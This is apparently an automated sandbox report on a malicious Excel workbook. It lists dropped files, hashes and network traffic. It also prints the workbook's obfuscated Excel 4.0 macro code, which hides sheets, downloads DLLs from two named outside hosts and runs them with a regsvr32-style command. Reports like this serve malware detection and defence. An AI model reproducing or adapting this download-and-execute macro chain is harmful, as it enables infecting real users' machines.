                                                                                                                                                              SSDEEP:12:6v/7aLMZ5I9TvSb5Lr6U7+uHK2yJtNJTNSB0qNMQCvGEvfvqVFsSq6ixPT3Zf:Ng8SdCU7+uqF20qNM1dvfSviNd
                                                                                                                                                              MD5:A516B6CB784827C6BDE58BC9D341C1BD
                                                                                                                                                              SHA1:9D602E7248E06FF639E6437A0A16EA7A4F9E6C73
                                                                                                                                                              SHA-256:EF8F7EDB6BA0B5ACEC64543A0AF1B133539FFD439F8324634C3F970112997074
                                                                                                                                                              SHA-512:C297A61DA1D7E7F247E14D188C425D43184139991B15A5F932403EE68C356B01879B90B7F96D55B0C9B02F6B9BFAF4E915191683126183E49E668B6049048D35
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview: .PNG........IHDR.............o.......sRGB.........pHYs..........+......IDAT8Oc.......l.9a._.X....@.`ddbc.]...........O..m7.r0|..."......?A.......w..;.N1u........_.[.\Y...BK=...F +.t.M~..oX..%....211o.q.P.".......y...../..l.r...4..Q]..h.....LL.d.......d....w.>{.e..k.7.9y.%.. .YpI...{.+Kv......./..\[...A....^.5c..O?.......G...VB..4HWY...9NU...?..S..$..1..6.U.....c... ....7..J. "M..5. ............_.......d.V.W.c.....Y.A..S....~.C.....q........t?..."n.....4......G_......Q..x..W.!L.a...3....MR.|.-P#P;..p._.......jUG....X........IEND.B`.
                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\8BD87A9.png
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                              File Type:PNG image data, 246 x 108, 8-bit/color RGB, non-interlaced
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):10270
                                                                                                                                                              Entropy (8bit):7.975714699744477
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:192:3sXvKLMbye/PEXiKTUgCto9h4F6NwfU6vGDpdYNbcQZgkbd4cgc:3iLh/gJ59CDfU6LocbGK
                                                                                                                                                              MD5:9C4F09E387EA7B36C8149EA7C5F8876E
                                                                                                                                                              SHA1:FF83384288EB89964C3872367E43F25FAFF007CC
                                                                                                                                                              SHA-256:A51C1D65092272DAEB2541D64A10539F0D04BC2F51B281C7A3296500CFCA56DE
                                                                                                                                                              SHA-512:0FDDE22CFDDE8BB1C04842D2810D0FD6D42192594E0D6120DE401B08B7E2CFFB5333792BC748E93CD70FA14734CC7D950620CB977DDBBDB52D92BDA8F35521F8
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview: .PNG........IHDR.......l...........sRGB.........pHYs..........+....'.IDATx^.].|.U...%...J.".....H.&Ui......E.........D.7....U.i..FH#=......3..$K....'{3....7........0.H......H..03..,....8.q........'@\...S@.../.0=....|....}|......0.... ...,LO........q._`az.....8......... .`..) @...X...q..>N...>.........q........'@\...S@.../.0=....|....}|......0.... ...,LO........q._`az.....8...l..m.i'Sj.W.i.S.TJ....D.D._%...]..i.;J..b..T.).Ik.L6..L.mN....!*..\..'{$.o._b..h....t"@.?...y...d..h..|..B9D..CJD..t."........bR"....I)H....z.......>|.....E.x..r....J.U..[...p:D....XF......A...E.....b..C...C..C......=.Z..$.=../....Y..x5CY.0l..,~.W. .?......;...$.'....<.H.2...z..6(.E........kw8w^.\~...".C,gl&.m..J2.).HI.....b.r...'.....r.H...P.....'...A.^.q..j).cZ.^1~.|.........dv^.^v..X..v..6/^.$rR. iK..H.Uu.Pvk....U.....'.Fd..Z.]mu\*1.Zb.\b...N..P..&tr;.W....J.K(@.^A..R.S.[~.v.R.YO...0-...2..h."..............7..Ng...R...e.&..@..t..N...{5...W.x./#.%..}t...F8-..M1..(4b1....&.....)B...6.
                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\BDF0B09F.png
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                              File Type:PNG image data, 490 x 30, 8-bit/color RGB, non-interlaced
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):18547
                                                                                                                                                              Entropy (8bit):7.9850486438978985
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:384:kBCIQCloAwCZDy0xOTn6/g6l4NpWfw9nHk6Ka01f7Y/H:kBCIQpAwODPMT6/gfOUKN70
                                                                                                                                                              MD5:ED31C7053D581EDC4C98D222CE02EDEF
                                                                                                                                                              SHA1:6BA7A49CC6FF8FE00E9C5BC75F48AB7E679536DD
                                                                                                                                                              SHA-256:0FCF61397154DF01CFAECA362BD643D88AAD5FEDD07B52DC8A921CC0D7236534
                                                                                                                                                              SHA-512:929BF13F2A050B33D0EABDAC97CAAFDDE612AD521027FEE4DD51E28A3CF61198D6C045E00AB85223C73D74D18BB4EAA1681C7AFA917946DC08A3C75FB2AB4935
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview: .PNG........IHDR.............l{......sRGB.........pHYs..........+....H.IDATx^...U............"x....U...."...Tc.{...M1M..In....TATb4F,`oD..Q..3......g.3..Lr.D....a8....~.z....Z...yyF..9...:.H.Q2..)/L.....Q.}....(J..,...w2>R.$..G2..m>..|...0.M.g.Xnjj...P.v..x....S......B..p.=.Lz.^..Wi..2U.V'.a..*DE.'..rT.z....#.;..]....[?.C...o.m`]..m][;.:<..]F.9..u..Q]c.Ue.9....(.F.Z.~s..Q:..B...)..LZ.TTo..P.gc.l.'.X.}..H....Q.h|....L..rcd.2dN..co..5.....w.U.4..}........{.Q.....D2.J.z~..:Y3,.H..(#.J.Q......N.._7....w.....].2w.6...._....u.......9-.7.f9...E9...p.A..f....=....Bqu....A.u.JG>b"...%..0..W.H=...G#.DR.....P.|FD).NJ....)>.;...M...T*.dW..t:[.xT..M.|S...O..."M.4u7.uS...]4..R.vK....*).ZK.. J.=.9C.].kr..ES..6..f.(.....N':..t..^.S....kn[s.#..(.....m.....~....6>....:u.J.mO.....%D...Q...6%....!......H.....v..^%....$.._..V........[o5.H8......n.~M.z.RL.0p:.iC.k.1..$...............3[....mS5..........E...2.&...k]...A.....K.8...5..O.@7.[-.F4*7...i....in...y....A
                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\pt[1].htm
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):504158
                                                                                                                                                              Entropy (8bit):5.8468417771868095
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:6144:l5NoCFH7OEn1J8JRO+njE2X2J/7vKsakTixuu8njF/EeBP:XKCFHyu1+lFGwuu8njF/Eq
                                                                                                                                                              MD5:DBF8EA4418AFB979A09B782CFBDACCBB
                                                                                                                                                              SHA1:03AA8B79FE5289A65C7327524DD052D1134BF537
                                                                                                                                                              SHA-256:E0934288689E1796773B1EEFFE0098C40962335D883A4B4DBAD87E68D975F548
                                                                                                                                                              SHA-512:128D0CEC8AAA9DFEDBA6E98D50747F5200FE7B68F82C7F969A89537D7F5E9EBAB47DF8B38F1F6ECDC1BBFA56C2D4614E4286454A2BF72F9AA8EB6E65ED1E771B
                                                                                                                                                              Malicious:true
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                              IE Cache URL:https://shadiinfo.com/2DP6mQeg/pt.html
                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................PE..L...<..`...........!.........^.......G.......................................`..............................................D...d........K..............................................................................D............................code...t........................... ..`.rdataf.............................@....rsrc....K.......L..................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                              C:\Users\user\AppData\Local\Temp\2BA10000
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):159443
                                                                                                                                                              Entropy (8bit):7.962652199904702
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3072:y89VlUBWA6CFvA7brCxAVIKuSkmxVymd1xXP8lTkdm3bGeAxiLpz:y83liWA6FiYpxVyWxf8lTkeGKB
                                                                                                                                                              MD5:3010C19E58529503ED930FA234B68245
                                                                                                                                                              SHA1:3E97B108C8192D0A8EE815A79D70D6CDC2F41D7E
                                                                                                                                                              SHA-256:DC74114DFB71D68F1D6026BF3614D566A46F46A92FE09762EA1941313818D3FD
                                                                                                                                                              SHA-512:929C68CD0AEB59C605E3F9F1F534AF5DAE8FB7B2FA3D5A6760B23C45FD895FDE420E537F4D1601D6B2F89E2003D64E4AC4AB50D6402A7E67F065B3BC0B05B160
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview: .U.n.0....?......(..r.mzl.$...\K....I..V.6Pl.6.^.....v.7.k.'...k.U3c.8.v].~=|.?...pJ..e[@v.x.n.....E;lY.R..9......pt...D...A.._.f.....Ku..l1..+.hRu...;%K.X.u._.j...h)...ON."..j.%(/.-A7."..=@...Q.c...(1d|.3.....Ys.>....4....E.T...?.Yo0.}..~R..VP..~.Kn...>..... .L.5l$..8.X!..ubi..v/..0.H..vu..Mr.~9..<Q....Q.....3'...C...r$.Q.Sr. ..)]6).DC.x...W.........=....>.....o.#:T..Y.....}.:.K......."Lw.e...:...a?[.&..v.......n^...7.......PK..........!..:......m.......[Content_Types].xml ...(.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                              C:\Users\user\Desktop\~$audit-1133808478.xlsb
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):165
                                                                                                                                                              Entropy (8bit):1.6081032063576088
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:RFXI6dtt:RJ1
                                                                                                                                                              MD5:7AB76C81182111AC93ACF915CA8331D5
                                                                                                                                                              SHA1:68B94B5D4C83A6FB415C8026AF61F3F8745E2559
                                                                                                                                                              SHA-256:6A499C020C6F82C54CD991CA52F84558C518CBD310B10623D847D878983A40EF
                                                                                                                                                              SHA-512:A09AB74DE8A70886C22FB628BDB6A2D773D31402D4E721F9EE2F8CCEE23A569342FEECF1B85C1A25183DD370D1DFFFF75317F628F9B3AA363BBB60694F5362C7
                                                                                                                                                              Malicious:true
                                                                                                                                                              Preview: .pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                              C:\Users\user\covi1.dll
                                                                                                                                                              Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):504158
                                                                                                                                                              Entropy (8bit):0.005987614520946852
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:6:idq2Vg3F+X32QbRfzHil/FstlRMglyl7+Ekt+tC6X4y:e9GSGQFfiyWglylxCJ
                                                                                                                                                              MD5:6EDC1D62B0DD8681DA9F35CC7320F44B
                                                                                                                                                              SHA1:5BFD270A9B7A28A26A29C56C825D93CB84242DC1
                                                                                                                                                              SHA-256:C74AC403D16F8A943741B28876CE112FEB57FAB8E9CA7AF2310F9BA46D6DE482
                                                                                                                                                              SHA-512:A7F1014EAE1B8552521ABFCAFCBF23EA4962B424D927F168CB3072AAF685CA6A383E1754284BACF0C441DD10E557998F0749ECBB463A751BE3045A6DD232AF9B
                                                                                                                                                              Malicious:true
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................PE..L...<..`...........!.........^.......G.......................................`..............................................D...d........K..............................................................................D............................code...t........................... ..`.rdataf.............................@....rsrc....K.......L..................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                              Static File Info

                                                                                                                                                              General

                                                                                                                                                              File type:Microsoft Excel 2007+
                                                                                                                                                              Entropy (8bit):7.955290238562611
                                                                                                                                                              TrID:
                                                                                                                                                              • Excel Microsoft Office Binary workbook document (47504/1) 49.74%
                                                                                                                                                              • Excel Microsoft Office Open XML Format document (40004/1) 41.89%
                                                                                                                                                              • ZIP compressed archive (8000/1) 8.38%
                                                                                                                                                              File name:audit-1133808478.xlsb
                                                                                                                                                              File size:158780
                                                                                                                                                              MD5:dbab0aba5ca271442b08d027f3ed391f
                                                                                                                                                              SHA1:0c163e79f6bffea037d225a221d0a701db03c2d0
                                                                                                                                                              SHA256:8987dac6f44dda69ceb74d59c276d38227e285c78f74e2d835283d1baa308176
                                                                                                                                                              SHA512:fac502b2fc494ca941ab13c48e2805af74270f2dca90eda896d9b8537f440f383912e1ed2a92d492fe161936dea1ff4b71f8b4b9b4d2509ba714dbdbedcf2e02
                                                                                                                                                              SSDEEP:3072:TtbU9VlUBWA6CFvA7bRCxAVIK2xVymd1xXP+Ph9vajtC1gBbZP6i:ZU3liWA6FsY2xVyWxf+QegBbd
                                                                                                                                                              File Content Preview:PK..........!.^.~.............[Content_Types].xml ...(.........................................................................................................................................................................................................

                                                                                                                                                              File Icon

                                                                                                                                                              Icon Hash:74f0d0d2c6d6d0f4

                                                                                                                                                              Static OLE Info

                                                                                                                                                              General

                                                                                                                                                              Document Type:OpenXML
                                                                                                                                                              Number of OLE Files:1

                                                                                                                                                              OLE File "audit-1133808478.xlsb"

                                                                                                                                                              Indicators

                                                                                                                                                              Has Summary Info:
                                                                                                                                                              Application Name:
                                                                                                                                                              Encrypted Document:
                                                                                                                                                              Contains Word Document Stream:
                                                                                                                                                              Contains Workbook/Book Stream:
                                                                                                                                                              Contains PowerPoint Document Stream:
                                                                                                                                                              Contains Visio Document Stream:
                                                                                                                                                              Contains ObjectPool Stream:
                                                                                                                                                              Flash Objects Count:
                                                                                                                                                              Contains VBA Macros:

                                                                                                                                                              Macro 4.0 Code

                                                                                                                                                              ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=HALT(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
                                                                                                                                                              ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,R,J,,CAL,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,EXEC,,,0,,LM,JC,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,on,CB,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,wnl,,oadT,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,Fil,,LDo,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,""")",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"""",,,,,o,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,&,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"(""r",,,,0,0,,,shadiinfo.com/2DP6mQeg/pt.html,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,eg,,,,,,,,treasurechestcaribbean.com/pZ2Z61bqa/pt.html,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,svr32 -s ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=,=,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"""",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,",",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"(""",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,",0",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
                                                                                                                                                              "=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=FORMULA('Doc2'!BL28,'Doc3'!AY16)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=ABS(8.74526348672131E+100)=ACOS(7.89475612348768E+58)=ACOSH(8.76976979789786E+39)=FORMULA(""U""&'Doc3'!AY16&'Doc2'!BL29&'Doc2'!BL30,'Doc3'!AY10)",,,,,,,,,,,,"=FORMULA('Doc2'!BO36,'Doc3'!AY13)",,,,,,"=FORMULA('Doc2'!BM28&'Doc2'!BM29&'Doc2'!BM30&""B"",'Doc3'!AY12)",,,,,,"=FORMULA(before.5.35.61.sheet!BP47,'Doc3'!AY17)",,,,,,"=FORMULA('Doc2'!BO37,'Doc3'!AY14)",,,,,,"=FORMULA('Doc2'!BK39,'Doc3'!AY18)",,,,,,"=FORMULA(""U""&'Doc3'!AY16&'Doc2'!BL32&'Doc2'!BJ31&'Doc2'!BL31&'Doc2'!BL34&'Doc2'!BJ32&""eA"",'Doc3'!AY11)",,,,,,"=FORMULA('Doc2'!BJ39&'Doc2'!BO28&'Doc3'!AY17&'Doc2'!BJ43&'Doc3'!AY10&'Doc2'!BJ41&'Doc2'!BJ42&'Doc2'!BJ41&'Doc3'!AY11&'Doc2'!BJ41&'Doc2'!BJ42&'Doc2'!BJ41&'Doc3'!AY12&'Doc2'!BJ41&'Doc2'!BJ45&'Doc2'!BJ42&'Doc2'!BJ41&""https://""&'Doc3'!AY14&'Doc2'!BJ41&'Doc2'!BJ42&'Doc2'!BJ41&before.5.35.61.sheet!BO53&'Doc2'!BJ41&'Doc2'!BJ45&'Doc2'!BJ45&'Doc2'!BJ44,'Doc3'!AW11)",,,,,,,,,,,,"=WORKBOOK.HIDE(""Doc2"",1)",,,,,,"=WORKBOOK.HIDE(""Doc4"",1)=WORKBOOK.HIDE(""Doc3"",1)",,,,,,"=RIGHT(""LdecvsbgvrsxLxrgxgL"",1)",,,,,,,,,,,,"=FORMULA('Doc3'!AY18&'Doc2'!BG29&'Doc2'!BG36&'Doc2'!BG37&'Doc2'!BG38&'Doc2'!BG34&'Doc2'!BG35&'Doc2'!BG34&before.5.35.61.sheet!BO52&'Doc2'!BG33,'Doc3'!AW14)",,,,,,"=FORMULA('Doc3'!AY18&'Doc2'!BG29&'Doc2'!BG36&'Doc2'!BG37&'Doc2'!BG38&'Doc2'!BG34&'Doc2'!BG35&'Doc2'!BG34&before.5.35.61.sheet!BO53&'Doc2'!BG33,'Doc3'!AW15)",,,,,,,,,,,"=""..\covi1.dll""","=FORMULA('Doc2'!BJ39&'Doc2'!BO28&'Doc3'!AY17&'Doc2'!BJ43&'Doc3'!AY10&'Doc2'!BJ41&'Doc2'!BJ42&'Doc2'!BJ41&'Doc3'!AY11&'Doc2'!BJ41&'Doc2'!BJ42&'Doc2'!BJ41&'Doc3'!AY12&'Doc2'!BJ41&'Doc2'!BJ45&'Doc2'!BJ42&'Doc2'!BJ41&""https://""&'Doc3'!AY13&'Doc2'!BJ41&'Doc2'!BJ42&'Doc2'!BJ41&before.5.35.61.sheet!BO52&'Doc2'!BJ41&'Doc2'!BJ45&'Doc2'!BJ45&'Doc2'!BJ44,'Doc3'!AW10)=SUMXMY2(452354,45245)",,,,,"=""..\covi2.dll""",,,,,,,,,,,,,,,,,,,=GOTO('Doc3'!AW2),,,,,,,,,,,,,,,,,,,,,,,"=LEFT(""LdecvsbgvrsxLxrgxg"",1)",

                                                                                                                                                              Network Behavior

                                                                                                                                                              Network Port Distribution

                                                                                                                                                              TCP Packets

                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                              Jun 11, 2021 11:02:10.006829023 CEST49720443192.168.2.343.225.55.182
                                                                                                                                                              Jun 11, 2021 11:02:10.180213928 CEST4434972043.225.55.182192.168.2.3
                                                                                                                                                              Jun 11, 2021 11:02:10.180315971 CEST49720443192.168.2.343.225.55.182
                                                                                                                                                              Jun 11, 2021 11:02:10.181369066 CEST49720443192.168.2.343.225.55.182
                                                                                                                                                              Jun 11, 2021 11:02:10.354885101 CEST4434972043.225.55.182192.168.2.3
                                                                                                                                                              Jun 11, 2021 11:02:10.355159044 CEST4434972043.225.55.182192.168.2.3
                                                                                                                                                              Jun 11, 2021 11:02:10.355202913 CEST4434972043.225.55.182192.168.2.3
                                                                                                                                                              Jun 11, 2021 11:02:10.355241060 CEST4434972043.225.55.182192.168.2.3
                                                                                                                                                              Jun 11, 2021 11:02:10.355247974 CEST49720443192.168.2.343.225.55.182
                                                                                                                                                              Jun 11, 2021 11:02:10.355278969 CEST4434972043.225.55.182192.168.2.3
                                                                                                                                                              Jun 11, 2021 11:02:10.355285883 CEST49720443192.168.2.343.225.55.182
                                                                                                                                                              Jun 11, 2021 11:02:10.355292082 CEST49720443192.168.2.343.225.55.182
                                                                                                                                                              Jun 11, 2021 11:02:10.355326891 CEST49720443192.168.2.343.225.55.182
